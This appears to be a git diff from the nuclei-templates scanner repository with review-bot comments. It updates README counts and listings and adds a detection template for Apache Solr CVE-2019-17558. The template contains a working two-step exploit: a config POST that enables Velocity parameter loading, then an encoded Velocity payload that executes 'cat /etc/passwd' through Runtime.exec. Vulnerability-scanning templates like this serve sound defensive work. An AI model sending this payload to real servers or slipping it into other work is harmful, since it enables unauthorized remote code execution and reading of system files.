commit
9ef6f7f029
|
@ -6,7 +6,28 @@
|
||||||
[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei)
|
[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei)
|
||||||
[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH)
|
[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH)
|
||||||
|
|
||||||
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** and grow the list.
|
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
|
||||||
|
|
||||||
|
An overview of the nuclei template directory including number of templates and HTTP request associated with each directory.
|
||||||
|
|
||||||
|
### nuclei templates `v6.0.7`
|
||||||
|
|
||||||
|
| Template Directory | Number of Templates | Number of HTTP/DNS requests |
|
||||||
|
|---------------------------|--------------------------|------------------------------|
|
||||||
|
| cves |86 |131 |
|
||||||
|
| default-credentials |03 |04 |
|
||||||
|
| dns |04 |04 |
|
||||||
|
| files |34 |111 |
|
||||||
|
| generic-detections |03 |03 |
|
||||||
|
| panels |28 |82 |
|
||||||
|
| security-misconfiguration |16 |93 |
|
||||||
|
| subdomain-takeover |02 |02 |
|
||||||
|
| technologies |24 |43 |
|
||||||
|
| tokens |07 |07 |
|
||||||
|
| vulnerabilities |26 |55 |
|
||||||
|
| workflows |12 |12* |
|
||||||
|
|
||||||
|
### nuclei templates `v6.0.7` tree overview
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
<summary>Template Directory</summary>
|
<summary>Template Directory</summary>
|
||||||
|
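Review bot: the new summary table does not reconcile with the totals this same commit states elsewhere. The twelve `Number of Templates` rows sum to 245 (86+3+4+34+3+28+16+2+24+7+26+12), while the footer updated further down reads `13 directories, **250 templates**`, and the table has twelve rows, not thirteen; either a directory is missing from the table or the counts are stale, so please regenerate both from the same source. The `12*` in the `workflows` row has no footnote explaining the asterisk, and the column header `Number of HTTP/DNS requests` should say what is being counted for workflows. Minor: `[Github issue]` should be `GitHub`, and "which power the actual scanning engine" should read "which powers".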
@ -16,6 +37,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── CVE-2017-10075.yaml
|
│ ├── CVE-2017-10075.yaml
|
||||||
│ ├── CVE-2017-14849.yaml
|
│ ├── CVE-2017-14849.yaml
|
||||||
│ ├── CVE-2017-5638.yaml
|
│ ├── CVE-2017-5638.yaml
|
||||||
|
│ ├── CVE-2017-7391.yaml
|
||||||
│ ├── CVE-2017-7529.yaml
|
│ ├── CVE-2017-7529.yaml
|
||||||
│ ├── CVE-2017-9506.yaml
|
│ ├── CVE-2017-9506.yaml
|
||||||
│ ├── CVE-2017-9841.yaml
|
│ ├── CVE-2017-9841.yaml
|
||||||
|
@ -41,9 +63,11 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── CVE-2019-11510.yaml
|
│ ├── CVE-2019-11510.yaml
|
||||||
│ ├── CVE-2019-11580.yaml
|
│ ├── CVE-2019-11580.yaml
|
||||||
│ ├── CVE-2019-12314.yaml
|
│ ├── CVE-2019-12314.yaml
|
||||||
|
│ ├── CVE-2019-12461.yaml
|
||||||
│ ├── CVE-2019-14322.yaml
|
│ ├── CVE-2019-14322.yaml
|
||||||
│ ├── CVE-2019-14974.yaml
|
│ ├── CVE-2019-14974.yaml
|
||||||
│ ├── CVE-2019-15043.yaml
|
│ ├── CVE-2019-15043.yaml
|
||||||
|
│ ├── CVE-2019-16278.yaml
|
||||||
│ ├── CVE-2019-16759-1.yaml
|
│ ├── CVE-2019-16759-1.yaml
|
||||||
│ ├── CVE-2019-16759.yaml
|
│ ├── CVE-2019-16759.yaml
|
||||||
│ ├── CVE-2019-17382.yaml
|
│ ├── CVE-2019-17382.yaml
|
||||||
|
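Review bot: the `cves` tree gains `CVE-2019-12461.yaml` and `CVE-2019-16278.yaml` here, but not `CVE-2019-17558.yaml`, which is the template this commit actually adds (the new file at the bottom of the diff). It belongs between `CVE-2019-16759.yaml` and `CVE-2019-17382.yaml`; if the tree is produced with `tree`, rerun it after adding the file rather than editing the listing by hand so the README and the repository stay in sync.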
@ -70,14 +94,18 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── CVE-2020-12720.yaml
|
│ ├── CVE-2020-12720.yaml
|
||||||
│ ├── CVE-2020-13167.yaml
|
│ ├── CVE-2020-13167.yaml
|
||||||
│ ├── CVE-2020-13379.yaml
|
│ ├── CVE-2020-13379.yaml
|
||||||
|
│ ├── CVE-2020-15920.yaml
|
||||||
│ ├── CVE-2020-17505.yaml
|
│ ├── CVE-2020-17505.yaml
|
||||||
│ ├── CVE-2020-17506.yaml
|
│ ├── CVE-2020-17506.yaml
|
||||||
│ ├── CVE-2020-2096.yaml
|
│ ├── CVE-2020-2096.yaml
|
||||||
|
│ ├── CVE-2020-2140.yaml
|
||||||
|
│ ├── CVE-2020-24223.yaml
|
||||||
│ ├── CVE-2020-3187.yaml
|
│ ├── CVE-2020-3187.yaml
|
||||||
│ ├── CVE-2020-3452.yaml
|
│ ├── CVE-2020-3452.yaml
|
||||||
│ ├── CVE-2020-5284.yaml
|
│ ├── CVE-2020-5284.yaml
|
||||||
│ ├── CVE-2020-5405.yaml
|
│ ├── CVE-2020-5405.yaml
|
||||||
│ ├── CVE-2020-5410.yaml
|
│ ├── CVE-2020-5410.yaml
|
||||||
|
│ ├── CVE-2020-5412.yaml
|
||||||
│ ├── CVE-2020-5902.yaml
|
│ ├── CVE-2020-5902.yaml
|
||||||
│ ├── CVE-2020-6287.yaml
|
│ ├── CVE-2020-6287.yaml
|
||||||
│ ├── CVE-2020-7209.yaml
|
│ ├── CVE-2020-7209.yaml
|
||||||
|
@ -111,6 +139,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── drupal-install.yaml
|
│ ├── drupal-install.yaml
|
||||||
│ ├── ds_store.yaml
|
│ ├── ds_store.yaml
|
||||||
│ ├── elasticsearch.yaml
|
│ ├── elasticsearch.yaml
|
||||||
|
│ ├── error-logs.yaml
|
||||||
│ ├── exposed-kibana.yaml
|
│ ├── exposed-kibana.yaml
|
||||||
│ ├── exposed-svn.yaml
|
│ ├── exposed-svn.yaml
|
||||||
│ ├── filezilla.yaml
|
│ ├── filezilla.yaml
|
||||||
|
@ -123,6 +152,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── lazy-file.yaml
|
│ ├── lazy-file.yaml
|
||||||
│ ├── phpinfo.yaml
|
│ ├── phpinfo.yaml
|
||||||
│ ├── public-tomcat-instance.yaml
|
│ ├── public-tomcat-instance.yaml
|
||||||
|
│ ├── robots.txt.yaml
|
||||||
│ ├── security.txt.yaml
|
│ ├── security.txt.yaml
|
||||||
│ ├── server-status-localhost.yaml
|
│ ├── server-status-localhost.yaml
|
||||||
│ ├── telerik-dialoghandler-detect.yaml
|
│ ├── telerik-dialoghandler-detect.yaml
|
||||||
|
@ -130,6 +160,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── tomcat-scripts.yaml
|
│ ├── tomcat-scripts.yaml
|
||||||
│ ├── wadl-files.yaml
|
│ ├── wadl-files.yaml
|
||||||
│ ├── web-config.yaml
|
│ ├── web-config.yaml
|
||||||
|
│ ├── wordpress-debug-log.yaml
|
||||||
│ ├── wordpress-directory-listing.yaml
|
│ ├── wordpress-directory-listing.yaml
|
||||||
│ ├── wordpress-user-enumeration.yaml
|
│ ├── wordpress-user-enumeration.yaml
|
||||||
│ ├── wp-xmlrpc.yaml
|
│ ├── wp-xmlrpc.yaml
|
||||||
|
@ -164,6 +195,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
│ ├── swagger-panel.yaml
|
│ ├── swagger-panel.yaml
|
||||||
│ ├── tikiwiki-cms.yaml
|
│ ├── tikiwiki-cms.yaml
|
||||||
│ ├── traefik-dashboard
|
│ ├── traefik-dashboard
|
||||||
|
│ ├── traefik-dashboard.yaml
|
||||||
│ ├── weave-scope-dashboard-detect.yaml
|
│ ├── weave-scope-dashboard-detect.yaml
|
||||||
│ ├── webeditors.yaml
|
│ ├── webeditors.yaml
|
||||||
│ └── workspaceone-uem-airWatch-dashboard-detect.yaml
|
│ └── workspaceone-uem-airWatch-dashboard-detect.yaml
|
||||||
|
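Review bot: after this hunk the `panels` listing shows both `traefik-dashboard` (an existing entry with no `.yaml` extension) and the newly added `traefik-dashboard.yaml`. If `traefik-dashboard` is a stray or misnamed file it should be removed or renamed rather than listed next to its `.yaml` twin; if it is a directory, the tree should show its contents. As it stands the pair reads as a duplicate and will confuse readers of the overview.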
@ -172,6 +204,8 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
├── security-misconfiguration
|
├── security-misconfiguration
|
||||||
│ ├── basic-cors-flash.yaml
|
│ ├── basic-cors-flash.yaml
|
||||||
│ ├── basic-cors.yaml
|
│ ├── basic-cors.yaml
|
||||||
|
│ ├── drupal-user-enum-ajax.yaml
|
||||||
|
│ ├── drupal-user-enum-redirect.yaml
|
||||||
│ ├── front-page-misconfig.yaml
|
│ ├── front-page-misconfig.yaml
|
||||||
│ ├── jira-service-desk-signup.yaml
|
│ ├── jira-service-desk-signup.yaml
|
||||||
│ ├── jira-unauthenticated-dashboards.yaml
|
│ ├── jira-unauthenticated-dashboards.yaml
|
||||||
|
@ -264,7 +298,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
13 directories, **235 templates**.
|
13 directories, **250 templates**.
|
||||||
|
|
||||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.
|
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.
|
||||||
|
|
||||||
|
@ -274,3 +308,4 @@ Please navigate to https://nuclei.projectdiscovery.io for detailed documentation
|
||||||
2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
|
2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
|
||||||
|
|
||||||
Thanks again for your contribution and keeping the community vibrant. :heart:
|
Thanks again for your contribution and keeping the community vibrant. :heart:
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,58 @@
|
||||||
|
id: CVE-2019-17558
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
|
||||||
|
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
|
||||||
|
# https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||||
|
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw: # Request: set "params.resource.loader.enabled"
|
||||||
|
- |
|
||||||
|
POST /solr/atom/config HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 259
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
{
|
||||||
|
"update-queryresponsewriter": {
|
||||||
|
"startup": "lazy",
|
||||||
|
"name": "velocity",
|
||||||
|
"class": "solr.VelocityResponseWriter",
|
||||||
|
"template.base.dir": "",
|
||||||
|
"solr.resource.loader.enabled": "true",
|
||||||
|
"params.resource.loader.enabled": "true"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
# RCE via velocity template:
|
||||||
|
# Get /etc/passwd
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
part: body
|